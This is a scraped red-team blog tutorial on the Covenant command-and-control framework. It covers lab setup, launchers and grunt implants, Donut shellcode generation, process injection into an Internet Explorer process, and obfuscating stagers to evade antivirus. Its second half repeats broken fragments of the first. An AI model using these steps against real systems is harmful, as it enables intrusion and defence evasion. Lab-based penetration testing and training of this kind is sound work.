A New PowerShell Empire - The Covenant C2 Tutorial

1/6/2021 A New PowerShell Empire - the Covenant C2 Tutorial
TRENDING: How I Use Cobra For Easy Golang CLI Flags  SEARCH 
ABOUT YOUTUBE COURSES PRICING ACCOUNT  BLOG 
A NEW POWERSHELL EMPIRE –

THE COVENANT C2 TUTORIAL
Posted by TEHG | Jan 14, 2020 | Redteam | 0
 | 
In this Covenant C2 tutorial you will need an

Active Directory environment see how to
create one quickly here. Covenant is the new
command and control framework for red
team and pentesting engagements.
PowerShell Empire is dead and honestly
Covenant is already 10x the beast Empire
could ever be.
New Command And Control Tool: Ho

https://ethicalhackingguru.com/a-new-powershell-empire-the-covenant-c2-tutorial/ 1/28
This Covenant C2 tutorial covers how to

setup Covenant and will continue to evolve
and document all aspects of optimized best
practices for using it as the premiere
command and control framework.
See Some Other Posts:
Crack Hashes With Hashcat Without Money

For A Dank PC Build Using Colabcat
How To Use Confuser Ex To Bypass

Antivirus
How To Execute A .NET Assembly Inside A

C# Program
How To Run Shellcode With Go
How To Inject Go ShellCode With C# Into

Other Processes
Here are some reasons to use the Covenant

C2 framework for red team engagements.
Dynamically compiles stagers.
Offensive security is moving away from

PowerShell and relying on native compiling
techniques this is the core philosophy of

Covenant.
Has its own Slack channel!
PowerShell Empire is no longer supported.
Table of Contents 
1. Here’s What You Need
2. Installation
3. Docker Installation
4. Adding Encryption
5. Listeners
6. Launchers
7. Getting a Grunt
8. Interacting with Grunts
9. Use Covenant for Priv Escalation
10. Grunt Taskings
11. How to Use Donut with Covenant
12. Use Donut 0.9.3
13. Alternatives To Compiling Donut
14. Inject A Covenant Stager PIC
15. How To Obfuscate Grunt Stagers
16. How To Import PowerShell Into Covenant
17. How To Use Covenant With Evil-WinRM
HERE’S WHAT YOU NEED
Kali Linux Virtual Machine – VirtualBox
Windows 10 64 Bit Virtual Machine –

VirtualBox
Windows 2016 64 Bit Virtual Machine –

VirtualBox
Windows Active Directory Accounts: 1

service account (an account with an SPN
set), 1 local admin account, one domain

admin account.
INSTALLATION
The rst step to install Covenant is to
download the dotnet-sdk.
I can’t nd the package! The Microsoft article

gives a solution that works, use it as seen
below.
This is the way I got it to work.
sudo dpkg --purge packages-micros

sudo apt-get update
sudo apt-get install {the .NET Co
After that now we can get the package

manager to locate and install the package
sudo apt-get install dotnet-sdk-2
And if that does not work as it may not in Kali

2020 then these are the steps.
sudo apt-get install -y gpg

wget -O- https://packages.microso
sudo mv microsoft.asc.gpg /etc/ap
wget https://packages.microsoft.c
sudo mv prod.list /etc/apt/source
sudo chown root:root /etc/apt/tru
sudo chown root:root /etc/apt/sou

sudo apt-get install -y apt-trans
sudo apt-get update
sudo apt-get install dotnet-sdk-2
Getting back to the installation for Covenant
$ ~ > git clone --recurse-submodu

$ ~ > cd Covenant/Covenant
$ ~/Covenant/Covenant > dotnet bu
$ ~/Covenant/Covenant > dotnet ru
Covenant/Covenant$ dotnet build &
DOCKER INSTALLATION
If you are inclined to you can install Covenant
using the Docker image although I don’t nd
the normal installation to be very di cult.
Covenant/Covenant$ docker build -
ADDING ENCRYPTION
Covenant connections are encrypted by
default. Let me say that again, by default
network tra c from Covenant is encrypted.
Using a dedicated HTTPS listener/agent

setup is used in the context of Covenant for
blending into normal tra c to not raise
suspicions.
Found a good tutorial for creating a self-

signed SSL certi cate. We want our
command and control framework
connections to be encrypted!
openssl req -newkey rsa:4096 \

-x509 \
-sha256 \
-days 3650 \
-nodes \
-out example.crt \
-keyout example.key
LISTENERS
Covenant listeners are the con gured
listening interfaces for Covenant to phone
back home to once its grunts are active.
The connectivity is extremely fast and

reliable in my experience and I did not run
into any issues at all in that regard.
There is a trick to listeners and it is to turn off

the HTTPS and SSL cert veri cation settings
as well as make sure you set the listener’s
ConnectAddress to the ip address of the Kali

Linux VM.
LAUNCHERS
In the Covenant architecture launchers are
used to create grunts. They launch attacks
on the targets.
When creating a new launcher there are

several options that can be explained by the
github page’s documentation.
Here is one for example.
The ValidateCert option determines if the

grunt will validate the listener’s SSL
certi cate to prevent MiTM attacks. There
are scenarios where target network
proxies can interfere with certi cate
validation, and it’s preferrable
to not validate the certi cate. This option
is only relavent when using the
HTTP CommType, and will only be
displayed if you have selected the
HTTP CommType.
https://github.com/cobbr/Covenant/wiki/Launchers
Covenant’s launchers are all of the hall of

fame modern Windows exploits. MSBuild,
PowerShell, InstallUtil, WMIC, Cscript,
Regsvr32, etc these are the whitelisted

application bypass technique tools that we
need to bypass hardened Windows security.
Even that isn’t enough now though and that is

why obfuscation is still required.
Although Covenant relies on the user to do on

his own. An example of using an obfuscated
command through Covenant would be taking
the output of generating a new launcher and
running it through something like the Donut
project.
GETTING A GRUNT
In order to get a grunt I copied the generated
PowerShell launcher command and hosted it
on a Python webserver on my Kali VM.
I then opened a cmd terminal on the

Windows 10 VM and ran the PowerShell
string.
You will have to whitelist the stager in

Windows Defender, because it will quarantine
it immediately.
Once that is taken care of you should be able

to get your rst grunt.
INTERACTING WITH GRUNTS

Get the launcher command to run on the
victim and get back a new grunt. Interacting
with grunts is done through the individual
grunt which is now communicating back to
the Covenant server.
Running commands is easy.
USE COVENANT FOR PRIV

ESCALATION
A popular Windows privilege escalation and
further enumeration tool post exploit is
named Seatbelt. In this example I have given
a command to my new grunt.
Seatbelt’s BasicOSInfo command runs and

the output is shown in the terminal.
GRUNT TASKINGS
The Grunt Taskings tab shows the requested
tasks given to grunts.
HOW TO USE DONUT WITH

COVENANT
Donut is a tool you should know about, it’s
changed the game a bit. Basically it allows
for position-independent shellcode for
process injection. Then you can use another
tool such as Rastamouse’s injector program
that takes donut shellcode as an input.
To build the newest Donut version:
Step 1.
Download Visual Studio 2019 and under get

new tools and features make sure you install
the c++ command line tool. You need an x64
Native Tools Prompt to build donut.
Step 2.
Get donut. I have preferred to use donut

version 0.9.3 which is precompiled in the
donut demos repository, get it here.
Step 3.
Open the x64 Native Tools Prompt and

navigate to the donut-master folder and
build.
USE DONUT 0.9.3

Step 1.
Start Covenant and download a binary after

setting up a listener and click the “Generate”
button then download.
Here are the details for my Grunt if you need

help. Make sure to target the 4.0 .NET
framework.
Make sure to target the 4.0 .NET framework.
Step 2.
Open a terminal and navigate to the donut-

demos-master folder. Run donut on the
GruntStager from Covenant. The -a 2 ag
means the target build is x64 bit, this is what
you want.
Step 3.
Run the donut loader on the instance le.

Voila! Sit back and look at the new Grunt.
donut.exe -f GruntStager.exe -a 2
loader.exe instance
This will create a new Grunt in the Covenant

console and from here I can either escalate
to get to a higher integrity process (more
privilege e.g. admin or root privileges).
ALTERNATIVES TO COMPILING
DONUT
Instead of compiling Donut and deciding
which version to use there is a convenient
method for creating PIC called donut-
maker.py.
INJECT A COVENANT STAGER PIC

In this Covenant C2 tutorial we covered how
to use several tools to create PIC Process-
Injectable-Code (shellcode) out of the
Covenant Grunt Stager.
When you are ready to process inject that

shellcode the next steps are really simple
thanks to RastaMouse.
1. PIC your Grunt Stager through donut-

maker.py.
2. Start a new Console Project in Visual Studio

2017 and name it “GruntInjection”. Copy
over the Injector Program.
3. Base64-encode your payload.bin (from Step

1) and paste it into the new C# project and
save.
4. Made an edit to the code by making it a

string literal which is done @”base64″.
5. Build GruntInjection targeting a x64 CPU

Con guration (This is important!)
6. Spawn a new iexplore.exe process by

starting a new Internet Explorer.
7. Run the binary on the target and give it the

PID of the running IE process to spoof. We
are spoo ng a (long term process) not
creating one out of thin air!
PS C:\Users\bob.bob> [System.Conv
Take the base64-encoded string and insert it

in the GruntInjection program.
// Hardcoded Grunt Stager

public static byte[] grun
C:\Users\bob.bob\source\repos\G
"C:\Program Files\Internet
Explorer\iexplore.exe" 2624
Now there should be a new Grunt in your

Covenant console.
HOW TO OBFUSCATE GRUNT

STAGERS
To obfuscate grunts you can run the C#

program through obfuscate.py which
replaces keywords with less common ones
for evading detection by AV.
python3 obfuscate.py
gruntstager.cs
Where is gruntstager.cs? By going to

Launchers in Covenant their is a Code tab
which contains the code for the stager.
From there get the le over to the Windows

target and build it with Visual Studio 2017.
HOW TO IMPORT POWERSHELL

INTO COVENANT
To import PowerShell privilege escalation

and recon scripts into Covenant go to the
Interact tab on an active Grunt and type in
"PowerShellImport".
This will open a le dialog where you choose

which script to import.
Once the script is imported you can call its

functions, this is an example suing the
PowerView.ps1 script.
powershell get-domainuser -identi
HOW TO USE COVENANT WITH

EVIL-WINRM
Curious what that function is in evil-winrm,

Donut-Loader?
I can use a convenient script named donut-

maker.py to create a Donut payload. This le
can then be used by evil-winrm Donut-Loader
function.
But rst to use Donut Maker I have to

download the module using pip3 install
donut-shellcode or you will get a message
'module not found'.
Donut-Loader spawns a new process which I

specify below. It also takes the donut le I
just created as an argument.
This command executes the donut payload

and spawns a new grunt in Covenant.
SHARE THIS:
 Twitter  Reddit
LIKE THIS:
Like
Be the first to like this.
SHARE:
RATE:
 PREVIOUS
NEXT 
How to Exploit WordPress
without Metasploit DC: 9 Vulnhub Tutorial
ABOUT THE AUTHOR
TEHG
RELATED POSTS
How To Hack the Sniff Out The Linux

Exploit Box: Jerry Vuln Privilege
Groups.x Walkthrou Paths: Escalation
ml Files gh BloodHou Using
without nd Active Kernel
Metasploi Directory Exploit
t Walkthrou Walkthrou
November 7, 2020 gh gh
November 19,
2019
April 4, 2019 February 9, 2020
© 2021 ethicalhackingguru.com

A New PowerShell Empire - The Covenant C2 Tutorial

Uploaded by

Document Information

Original Title

Copyright

Available Formats

Share this document

Share or Embed Document

Sharing Options

Did you find this document useful?

Is this content inappropriate?

Copyright:

Available Formats

A New PowerShell Empire - The Covenant C2 Tutorial

Uploaded by

Copyright:

Available Formats

1/6/2021 A New PowerShell Empire - the Covenant C2 Tutorial

ABOUT YOUTUBE COURSES PRICING ACCOUNT  BLOG 

A NEW POWERSHELL EMPIRE –

In this Covenant C2 tutorial you will need an

New Command And Control Tool: Ho

This Covenant C2 tutorial covers how to

See Some Other Posts:

Crack Hashes With Hashcat Without Money

How To Use Confuser Ex To Bypass

How To Execute A .NET Assembly Inside A

How To Run Shellcode With Go

How To Inject Go ShellCode With C# Into

Here are some reasons to use the Covenant

Dynamically compiles stagers.

Offensive security is moving away from

techniques this is the core philosophy of

Has its own Slack channel!

PowerShell Empire is no longer supported.

HERE’S WHAT YOU NEED

Kali Linux Virtual Machine – VirtualBox

Windows 10 64 Bit Virtual Machine –

Windows 2016 64 Bit Virtual Machine –

Windows Active Directory Accounts: 1

set), 1 local admin account, one domain

I can’t nd the package! The Microsoft article

This is the way I got it to work.

sudo dpkg --purge packages-micros

After that now we can get the package

sudo apt-get install dotnet-sdk-2

And if that does not work as it may not in Kali

sudo apt-get install -y gpg

sudo chown root:root /etc/apt/sou

Getting back to the installation for Covenant

$ ~ > git clone --recurse-submodu

Covenant/Covenant$ docker build -

Using a dedicated HTTPS listener/agent

Found a good tutorial for creating a self-

openssl req -newkey rsa:4096 \

The connectivity is extremely fast and

There is a trick to listeners and it is to turn off

ConnectAddress to the ip address of the Kali

When creating a new launcher there are

Here is one for example.

The ValidateCert option determines if the

Covenant’s launchers are all of the hall of

Regsvr32, etc these are the whitelisted

Even that isn’t enough now though and that is

Although Covenant relies on the user to do on

I then opened a cmd terminal on the

You will have to whitelist the stager in

Once that is taken care of you should be able

INTERACTING WITH GRUNTS

Running commands is easy.

USE COVENANT FOR PRIV

Seatbelt’s BasicOSInfo command runs and

HOW TO USE DONUT WITH

To build the newest Donut version:

Download Visual Studio 2019 and under get

Get donut. I have preferred to use donut

Open the x64 Native Tools Prompt and

USE DONUT 0.9.3

Start Covenant and download a binary after

Here are the details for my Grunt if you need